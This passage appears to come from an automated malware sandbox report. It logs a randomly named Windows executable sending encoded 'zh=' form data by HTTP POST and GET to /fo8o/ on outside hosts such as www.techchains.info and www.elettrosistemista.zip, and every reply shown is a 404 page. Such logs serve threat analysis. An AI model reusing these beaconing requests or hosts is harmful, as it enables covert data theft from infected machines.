                                                                            Connection: close
                                                                            Content-Type: text/html
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            15192.168.2.114999066.29.149.46803796C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 25, 2024 14:00:03.154845953 CET1809OUTPOST /fo8o/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.techchains.info
                                                                            Origin: http://www.techchains.info
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 1231
                                                                            Referer: http://www.techchains.info/fo8o/
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Data Raw: 7a 68 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 51 33 56 31 77 62 4b 75 38 61 56 49 75 67 51 4b 44 6a 37 35 76 69 47 7a 2b 4b 30 77 6e 32 47 76 56 53 42 6d 2b 72 4b 4e 51 47 4f 4c 6b 39 35 6e 58 63 51 47 46 45 58 56 71 4b 4b 35 32 48 69 4a 4f 69 48 31 54 6e 68 64 59 2f 63 4a 69 69 50 6d 36 7a 54 41 68 7a 59 65 73 77 4a 73 41 44 75 39 73 67 4d 59 4f 71 65 79 53 51 41 4a 42 62 5a 56 51 6c 35 78 76 65 50 74 44 57 53 53 39 70 4e 6e 63 57 44 32 67 46 78 33 68 31 79 6c 4d 79 77 42 4d 77 32 39 50 42 42 6b 57 43 67 36 35 42 57 38 71 68 53 34 62 52 2b 34 76 2f 71 6c 59 78 49 79 30 52 52 4a 71 57 32 41 7a 76 70 6a 47 62 49 38 31 4c 70 36 56 6b 71 62 39 50 7a 33 70 72 75 61 75 50 52 51 6d 44 34 44 49 71 68 2b 41 4e 67 61 38 6b 31 58 38 6b 79 50 74 4d 6d 67 59 70 33 4f 63 45 34 33 4a 57 57 37 4e 75 4c 65 49 6f 76 41 4a 52 66 63 6e 2f 44 2b 4a 63 52 51 61 42 5a 72 68 6b 73 75 44 75 5a 71 6c 45 73 48 4a 2f 58 37 38 67 57 6f 4c [TRUNCATED]
                                                                            Data Ascii: zh=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVQ3V1wbKu8aVIugQKDj75viGz+K0wn2GvVSBm+rKNQGOLk95nXcQGFEXVqKK52HiJOiH1TnhdY/cJiiPm6zTAhzYeswJsADu9sgMYOqeySQAJBbZVQl5xvePtDWSS9pNncWD2gFx3h1ylMywBMw29PBBkWCg65BW8qhS4bR+4v/qlYxIy0RRJqW2AzvpjGbI81Lp6Vkqb9Pz3pruauPRQmD4DIqh+ANga8k1X8kyPtMmgYp3OcE43JWW7NuLeIovAJRfcn/D+JcRQaBZrhksuDuZqlEsHJ/X78gWoLuPOUIMSi8BLb47JHp5nQZNcZXj6xRy4dk7daE4QycCvUUzUe6EDlGixQLo2JyxdCCjB99BrvphzvRh4YgEGGjeh5yUsv1M8Swhi2DjBkp5+8N11pcLjj3V7fQpSR0PSbup4sS5SNgcqy1OyN6NQg0D3zhu0uTn2L36rqvfHgwJd9//Tb/N88McRvyiwEr1yezxIxoqUTcrzuODPRImGdo/9kkAc1DTw2V4hef8j9sq6pFbKqYEEzteLxE5bv26a4FhdJ2sde8AD3wM9OOmqmP2UoElyz+AtLUDI30lOFLvR6OdE/vKyNfB2f5iYaORF6iXVqgihsMOuRveXNnr3PLe3OF82PwODAsZEk9WL/Is2E4pDKPYkqBbJ1GFY0u0sdy2xleEX8hzGvYCZ87iI4JtiEq3glhpewWSmVpoo9MOgjdfe3XTFL9UprM/MFdG+hWqy4ENYRWYrAd8xmpTJSIhSgdJ36TrBrwLCv6dq/n7JXDju0+G5F5M4OBaao6BBN6X1aPbfiAJfNrPXYNpqtB5i7PHCPdS9odhOlHYvbTs4Cig/ZO6ilvjlRdQJ7fysN4YFtFVB6oRTMeRNi774E/Ljslpf2PV7QLwY0uEVKtcZXicROPQHqfVLgzBeTjqkISEt/czv/uq3xvBG0GN1kK4AR+TWbxSCAWF [TRUNCATED]
                                                                            Nov 25, 2024 14:00:04.695288897 CET637INHTTP/1.1 404 Not Found
                                                                            Date: Mon, 25 Nov 2024 13:00:04 GMT
                                                                            Server: Apache
                                                                            Content-Length: 493
                                                                            Connection: close
                                                                            Content-Type: text/html
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            16192.168.2.114999166.29.149.46803796C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 25, 2024 14:00:05.803013086 CET508OUTGET /fo8o/?zh=vefd0teQh+kbruh5/qap98pA+QvvtGaRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5hLa481lrDHTJpcFWPIOqV4sO7fmSS56YSbpU=&HpnH2=lZrlsdK8B4Q HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Host: www.techchains.info
                                                                            Connection: close
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Nov 25, 2024 14:00:07.086117983 CET652INHTTP/1.1 404 Not Found
                                                                            Date: Mon, 25 Nov 2024 13:00:06 GMT
                                                                            Server: Apache
                                                                            Content-Length: 493
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            17192.168.2.1149992195.110.124.133803796C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 25, 2024 14:00:13.170790911 CET794OUTPOST /fo8o/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.elettrosistemista.zip
                                                                            Origin: http://www.elettrosistemista.zip
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 199
                                                                            Referer: http://www.elettrosistemista.zip/fo8o/
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Data Raw: 7a 68 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 76 6d 32 51 6e 6b 66 65 70 77 6d 59 51 51 49 75 59 79 6b 47 36 6a 78 58 2b 63 76 52 43 5a 32 50 63 46 4a 72 4d 72 41 4a 43 36 75 58 59 6d 75 39 6a 64 4a 31 34 34 7a 75 7a 2b 41 61 39 38 54 48 42 42 78 47 46 63 4d 7a 4d 33 46 68 63 34 4f 49 2f 6d 37 30 69 66 45 7a 4e 2f 72 72 59 5a 64 79 47 51 6a 37 6c 47 44 77 73 44 61 67 72 6a 66 47 46 6a 45 39 50 77 4b 76 6c 41 2b 6f 36 55 41 6f 66 70 2b 54 36 47 38 6d 32 73 42 73 43 45 72 73 52 67 4e 43 6a 6a 31 59 33 6f 63 6d 41 4e 4b 41 2f 57 70 73 57 64 5a 74 54 69 7a 55 70 74 74 47 63 72 37 79 6e 77 3d 3d
                                                                            Data Ascii: zh=WMd0CYxlLH1jvm2QnkfepwmYQQIuYykG6jxX+cvRCZ2PcFJrMrAJC6uXYmu9jdJ144zuz+Aa98THBBxGFcMzM3Fhc4OI/m70ifEzN/rrYZdyGQj7lGDwsDagrjfGFjE9PwKvlA+o6UAofp+T6G8m2sBsCErsRgNCjj1Y3ocmANKA/WpsWdZtTizUpttGcr7ynw==
                                                                            Nov 25, 2024 14:00:14.523360014 CET367INHTTP/1.1 404 Not Found
                                                                            Date: Mon, 25 Nov 2024 13:00:14 GMT
                                                                            Server: Apache
                                                                            Content-Length: 203
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            18192.168.2.1149993195.110.124.133803796C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 25, 2024 14:00:15.818893909 CET814OUTPOST /fo8o/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.elettrosistemista.zip
                                                                            Origin: http://www.elettrosistemista.zip
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 219
                                                                            Referer: http://www.elettrosistemista.zip/fo8o/
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Data Raw: 7a 68 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 73 75 50 66 6c 35 72 65 71 41 4a 46 36 75 58 58 47 75 38 6e 64 4a 71 34 34 2f 51 7a 2f 38 61 39 39 33 48 42 46 31 47 46 72 51 30 50 48 46 6a 58 59 4f 47 69 57 37 30 69 66 45 7a 4e 2b 62 52 59 64 78 79 47 41 7a 37 6b 6e 44 7a 76 44 61 6a 73 6a 66 47 58 54 45 35 50 77 4b 4e 6c 42 7a 39 36 53 45 6f 66 72 6d 54 30 79 67 6c 2f 73 42 71 66 55 71 35 64 77 4d 30 36 52 41 4c 34 75 6b 49 49 4d 65 5a 33 77 34 32 47 2b 51 36 51 78 37 57 39 4c 4d 32 56 61 65 37 38 34 48 31 4a 4c 77 74 36 76 72 54 69 5a 71 79 4c 4b 47 4c 79 70 55 3d
                                                                            Data Ascii: zh=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCsuPfl5reqAJF6uXXGu8ndJq44/Qz/8a993HBF1GFrQ0PHFjXYOGiW70ifEzN+bRYdxyGAz7knDzvDajsjfGXTE5PwKNlBz96SEofrmT0ygl/sBqfUq5dwM06RAL4ukIIMeZ3w42G+Q6Qx7W9LM2Vae784H1JLwt6vrTiZqyLKGLypU=
                                                                            Nov 25, 2024 14:00:17.173274994 CET367INHTTP/1.1 404 Not Found
                                                                            Date: Mon, 25 Nov 2024 13:00:16 GMT
                                                                            Server: Apache
                                                                            Content-Length: 203
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            19192.168.2.1149994195.110.124.133803796C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 25, 2024 14:00:18.473773956 CET1827OUTPOST /fo8o/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.elettrosistemista.zip
                                                                            Origin: http://www.elettrosistemista.zip
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 1231
                                                                            Referer: http://www.elettrosistemista.zip/fo8o/
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Data Raw: 7a 68 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 76 4f 50 63 58 78 72 64 4a 6f 4a 45 36 75 58 65 6d 75 68 6e 64 49 32 34 34 6e 4d 7a 2f 77 4b 39 2b 66 48 42 6d 74 47 44 65 6b 30 59 58 46 6a 59 34 4f 4c 2f 6d 37 62 69 66 55 33 4e 2b 72 52 59 64 78 79 47 43 37 37 6a 32 44 7a 70 44 61 67 72 6a 66 4b 46 6a 46 65 50 77 69 33 6c 42 32 47 35 69 6b 6f 66 4c 32 54 32 48 38 6c 6a 38 42 6f 63 55 72 36 64 77 41 6e 36 52 4d 48 34 71 73 6d 49 4d 32 5a 30 33 46 74 57 4d 51 6d 4b 53 66 2f 2f 71 30 53 65 49 71 75 39 59 76 43 4b 61 34 43 35 6f 76 44 76 4d 6e 39 54 72 53 68 71 4f 48 2b 75 48 5a 35 5a 30 51 37 30 74 4e 47 45 30 61 73 4e 45 43 76 6f 50 68 41 71 41 5a 71 35 46 73 4f 52 6c 72 65 5a 61 4b 48 65 6f 2b 45 41 7a 2b 42 2f 77 36 52 30 4e 43 35 38 4b 33 65 51 48 39 45 50 32 53 7a 58 78 48 55 52 70 75 4d 43 75 66 49 7a 70 43 78 67 70 7a 77 38 69 31 6d 6b 52 56 59 69 74 6d 32 67 6f 5a 2b 2f 69 78 6a 34 37 72 76 6a 66 45 46 70 75 76 [TRUNCATED]
                                                                            Data Ascii: zh=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCvOPcXxrdJoJE6uXemuhndI244nMz/wK9+fHBmtGDek0YXFjY4OL/m7bifU3N+rRYdxyGC77j2DzpDagrjfKFjFePwi3lB2G5ikofL2T2H8lj8BocUr6dwAn6RMH4qsmIM2Z03FtWMQmKSf//q0SeIqu9YvCKa4C5ovDvMn9TrShqOH+uHZ5Z0Q70tNGE0asNECvoPhAqAZq5FsORlreZaKHeo+EAz+B/w6R0NC58K3eQH9EP2SzXxHURpuMCufIzpCxgpzw8i1mkRVYitm2goZ+/ixj47rvjfEFpuvNwsVGrC9Ifw2YrdCRtt6C8W3LYNMRo5bYRsp5nM/eqiKZoxDflpLJCB1lRodrNt9wL04Nd7adY6PPSb476q0i+bu10gTKbeXTHyOaenEfiuVRmO72bsYEpgRn4m0ARNwjYtA65YOS7JXA8qQ4K9w9v/qN+KXZPJUNrbSTjcl0CHC76zVXxuY6wgzGJMRREr9A1TJuKLLjaVAHZhBS1HFnst0RWFnyMLcWMY8zHnXPVVlHGaARFntTU9iJOShkDobbE4bxpzRvrx3smt0iagNxgUkf42LnmXB77IDUvOHKaMw4jHgXDTNYUuMx5g+ZxF88k4BmOuLm7pBmuxaWcfuZbkEjdNsgskBmrlzWxDV2gWk+nTarmpinYncgXqbQpn9VwdLEIOnttC6qdI29Pk1HxAJDpy82osJwl7b0///lasC6eLXP8fUED0Hy2+aXdtZXRQ0bjMOhRYVgzT2dFUJqP+S2/PYOh1vlxbwgPiNEUUxiuhu+eO/eEXt3hnDk6T8j/nIXnpCt2+M4YwZXaqGDZVZbWHZxfsi1Y5DPQ2m5KNYYJR0oN34/yMD/o25olPeOVY9YHBPp8FUz6KQFYNX/3E5uKXdkfbkP75msiDk0HTc1LpVvnfRQgVFLjwMx8sjZDmdjV1KA1w0dgcl8bFsYA1+LCJASEbtsr [TRUNCATED]
                                                                            Nov 25, 2024 14:00:19.957062960 CET367INHTTP/1.1 404 Not Found
                                                                            Date: Mon, 25 Nov 2024 13:00:19 GMT
                                                                            Server: Apache
                                                                            Content-Length: 203
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            20192.168.2.1149995195.110.124.133803796C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 25, 2024 14:00:21.129354000 CET514OUTGET /fo8o/?HpnH2=lZrlsdK8B4Q&zh=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMdSNMaLujgCrTpNg/TOHpJ8V8eDXM6X/ojyE= HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Host: www.elettrosistemista.zip
                                                                            Connection: close
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Nov 25, 2024 14:00:22.539127111 CET367INHTTP/1.1 404 Not Found
                                                                            Date: Mon, 25 Nov 2024 13:00:22 GMT
                                                                            Server: Apache
                                                                            Content-Length: 203
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            21192.168.2.1149996217.196.55.202803796C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 25, 2024 14:00:44.956372976 CET782OUTPOST /fo8o/ HTTP/1.1
